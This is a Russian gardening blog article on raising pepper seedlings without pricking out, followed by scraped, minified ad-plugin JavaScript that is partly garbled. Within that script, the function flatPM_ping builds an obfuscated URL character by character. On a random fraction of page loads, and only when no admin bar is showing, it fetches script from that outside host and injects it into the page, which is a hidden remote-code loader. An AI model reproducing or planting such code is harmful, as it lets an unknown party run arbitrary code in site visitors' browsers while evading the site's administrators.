В первые годы появления у меня дачного участка, я, будучи неопытным огородником, покупала рассаду перца и других овощей на рынке. Но столкнулась с тем, что у меня много саженцев погибало, да и урожай не впечатлял. Иногда даже сорт перца значительно отличался от обещанного продавцом.

Сначала решила, что это моя вина – не соблюдаю технологию посадки, ухода. Так продолжалось пару лет, пока однажды опытные огородники не поведали мне, что оказывается перец (несмотря на свой мужской род) – очень нежное и чувствительное растение. Он не любит, когда его часто беспокоят, поэтому даже обычная пикировка травмирует его нервную систему.

К сведению! Корневая система перца, выращенного без пикировки, гораздо крупнее, чем у пикированного. Это делает растение более стойким.

Покупая готовые саженцы, приходится рассчитывать на порядочность продавцов. А используя собранные собственноручно семена и выращивая рассаду дома, можно быть уверенной, что получишь именно тот сорт перца, который хотела.

Особенности выращивания рассады без пикировки

Почитав форумы любителей садовых и огородных работ, пообщавшись с опытными огородниками, ознакомившись со специальной литературой, я приступила к выращиванию рассады перца дома.

Первые результаты моей самостоятельной работы были довольно скромными. Постепенно, я приобретала опыт, учитывала все предыдущие ошибки и, наконец, получила долгожданный богатый урожай перца.

Основные секреты получения здоровой рассады заключаются в следующем:

  • Подготовка семян.
  • Правильный выбор почвы.
  • Посев семян.
  • Уход за всходами.
  • Перевалка.

Выращивание саженцев сладкого и горького перца ничем не отличаются. Отличие во времени созревания. Горький созревает гораздо позже, чем сладкий. Поэтому рассаду острого перца начинаю выращивать пораньше.

Готовим семена

Выбор и подготовка посевного материала – самый ответственный этап, так как от него зависит будущий урожай. Некачественные или неправильно подготовленные семена могут не дать всходов.

Первые годы покупала семена в специализированных магазинах. Но затем решила сохранять свой посевной материал.

Кстати, покупая семена, Вы часто обращаете внимание, какой срок хранения указан на упаковке? Казалось бы, это не пищевой продукт, чтобы имело столь важное значение. Однако имеет, так как старые семена могут не взойти. Поэтому обязательно смотрите дату расфасовки и срок хранения.

Итак, просмотрев все имеющиеся у меня семена, удаляю слишком мелкие и поврежденные. Затем делаю солевой раствор, взяв 2 чайные ложки соли и 0,5 л. воды. В этот раствор опускаю семена минут на 10. Те, которые всплыли – выкидываю. Оставшиеся раскладываю на бумаге для просушки. Подготовка к посеву не закончена. Дальше идут такие мероприятия:

Использую марганцевый раствор для замачивания семян. Делаю это для предотвращения появления инфекции.

Помещаю семена в стимулятор роста. Я использую сок алоэ, благо у меня имеется это растение. Но можно использовать готовые стимуляторы.

Чтобы насытить семена полезными микроэлементами, делаю раствор золы, куда опускаю на сутки семена. Для приготовления раствора нужно 2 столовые ложки древесной золы и литр теплой воды.

Перец большой сладкоежка, обожает медовые ванны. Кусочек марли пропитываю сладким раствором (0,5 ч.л. меда на 0,5 стакана воды), заворачиваю семена, кладу их на сутки в теплое место. Такая спа-процедура помогает семенам быстрее проклюнуться.

Ну а пока они наслаждаются медом, подготавливаю почву.

Подготовка грунта

Мы помним, что перец существо капризное, к грунту у него тоже есть определенные требования. Он любит рыхлую, насыщенную питательными веществами почву.

Самым лучшим вариантом будет смесь, состоящая из компоста, торфа, песка (2:2:1). У кого нет такой возможности, можно приобрести готовый грунт.

Так как готовлю почву сама, то обязательно дезинфицирую ее, чтобы избавить от микробов. Для этого использую обычную духовку, поставив туда емкость с грунтом для прогревания.

Итак, земля готова, семена проклюнулись, можно приступать к посадке.

Высаживаем семена

Емкость для посадки используется самая разнообразная: одноразовые стаканчики, горшочки, небольшие пластиковые контейнеры. Пару раз пыталась использовать торфяные горшочки, но отказалась. У них очень плотная структура, затрудняющая корням рост. Плюс ко всему они вытягивали на себя всю влагу из почвы.

После многочисленных экспериментов, остановилась на пластиковых стаканчиках.

Стаканчики я тоже дезинфицирую марганцевым раствором. На дно насыпаю дренаж, заполняю почвенной смесью не доходя 2 см до бортиков емкости. В каждый стаканчик помещаю по 2 семени. Позже, когда семена прорастут, оставляю более сильный росток, а слабый удаляю. Все, как в жизни – выживают сильнейшие.

Затем осторожно поливаю, чтобы не вымыть семена на поверхность. Для создания парникового эффекта накрываю его пленкой. Так как первые дни перцу не нужен свет, выбираю темное, теплое место.

Обычно первые ростки появляются на 10-й – 12-й день.

Ухаживаем за всходами

Увидев первые всходы, снимаю пленку, ставлю стаканчики на свет. Как я поняла после многочисленных экспериментов, главное при выращивании рассады это обеспечение тщательного ухода, который состоит из:

  • Правильного освещения. Перец любит свет, поэтому мне приходилось выставлять вечерами дополнительное освещение. Иначе при недостатке света сеянцы вытягивались. Если замечала, что растение клонится в одну сторону, поворачивала его другой стороной к свету.
  • Полива. Первые дни, пока ростки еще хрупкие, поливала их чайной ложкой прямо под корень. Можно также использовать шприц или пипетку. Подросшие побеги поливаю специальной маленькой лейкой, стараясь не задеть листья и стебли. Для полива использую только теплую отстоянную воду. Поливаю обычно через каждые три дня, так как переизбыток влаги также опасен, как недостаток.
  • Подкормки. До окончательной высадки побегов, 2-3 раза их подкармливаю. Первый раз – после того, как появляются 3-4 листа. Удобрения покупаю готовые. Можно конечно приготовить самому. Но для этого нужно иметь коровий навоз либо птичий помет, чтобы приготовить питательный раствор.

Перевалка рассады

Как только побеги немного подрастают, первоначальная емкость становится для них маловата, я перевожу их в такие же пластиковые стаканчики, но большего размера.

Вы наверное подумали, что это та же самая пикировка. Но, на самом деле это не так. Это скорее переваливание растения. Чем отличаются эти два способа? При пикировке растение выкапывается, затем пересаживается. При этом часто травмируется корень. А при перевалке я не выкапываю саженец.

Вот тут вы поймете, почему мне удобнее использовать пластиковые стаканчики. Они легко разрезаются ножницами и снимаются. Остается земляной ком с молодым побегом, который помещается в больший стакан. После перевалки рассаду надо подкормить либо полить медовой водой.

Дальнейший уход за рассадой такой же, как и до перевалки.

Пересадка в открытый грунт

Вот и наступил завершающий этап в выращивании рассады перца без пикировки.

За пару недель до высадки рассады в грунт, я провожу процедуру закаливания растения.

Для этого выношу рассаду на балкон. Первый раз оставляю ее там минут на 20, ежедневно увеличивая время. Если нет балкона или веранды, то можно для создания пониженной температуры просто открывать форточку.

Высаживаю перец в грунт обычно в конце мая или начале июня. Первое время на ночь укрываю его пленкой. Подготовив лунки для посадки, добавляю туда перегной и золу. Процедура посадки схожа с перевалкой. Также разрезаю стаканчики, с комом земли помещаю рассаду в лунку.

Важно! Если Вы решили вырастить сладкий и горький перец, то рассаду лучше держать в разных помещениях. Точно также на участке желательно расположить их как можно дальше, чтобы растения не опылили друг друга. Иначе получите вместо сладкого перца – горький.

Я обычно сажаю перец рядами, делая расстояние между ними 50-60 см, а между перцами оставляю 25-30 см свободного пространства. Ну а дальше остается только поливать, периодически рыхлить, удобрять почву.

Надеюсь, мои советы помогут Вам вырастить рассаду перца без пикировки и получить замечательный урожай.

Может быть, у кого-то есть уже такой опыт и имеются свои секреты в выращивании рассады. Хотелось бы, чтобы Вы поделились ими в комментариях.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};